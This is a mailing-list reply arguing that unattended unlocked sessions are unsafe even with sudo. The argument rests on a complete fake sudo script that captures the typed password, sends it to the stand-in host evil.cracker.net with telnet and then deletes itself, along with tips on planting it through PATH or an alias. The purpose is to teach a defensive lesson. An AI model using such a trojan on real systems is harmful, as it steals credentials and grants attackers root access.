On Wed, Nov 01, 2000 at 11:48:34AM -0700, Hubert Chan wrote: > > Not quite. It makes my password equivalent to a root password. And it just so > happens that my root password is the same as my normal account password > anyways. ;-) Yes, I know it's not the best thing to do, but I can't keep track > of that many passwords. ewra ;-) > Leaving myself logged in is OK, because sudo asks for my password. If someone > knew my password so that they could use sudo, they could log into my account > anyways, so I'm not too worried about that. do you always type /usr/bin/sudo instead of just sudo? #! /bin/sh ## this is a fake sudo printf 1>&2 "Password: " read password echo "$password" | telnet evil.cracker.net 1337 > /dev/null 2>&1 echo 1>&2 "Sorry, try again." rm -f ~/bin/sudo exec /usr/bin/sudo "$@" this only works if you type your password correctly the first time, but you will just think you made a typo and type it again, this time into a real sudo prompt, you will never be the wiser since the trojan self deletes after it sends your password off. it could ask your password twice in a fake way to get a better chance of getting it correct, then your 3rd try will be the charm as the real sudo gets it. the telnet trick is to avoid traces in the mail logs left by using echo | mail. all the evil doer would have to do is alter your PATH to put ~/bin first (if its not there already) and add the ~/bin/sudo script. how often do you ls your ~/bin ? if you don't even have a ~/bin the script could just rm -rf it. of course even typeing /usr/bin/sudo is not totally safe since alias /usr/bin/sudo='~/bin/fakesudo' works fine in bash :( never ever leave unattended unlocked sessions. thats what vlock is for. > And no, my password never goes unencrypted over the network. ;-) thats good anyway. -- Ethan Benson http://www.alaska.net/~erbenson/
Attachment:
pgpJszUEzTqrD.pgp
Description: PGP signature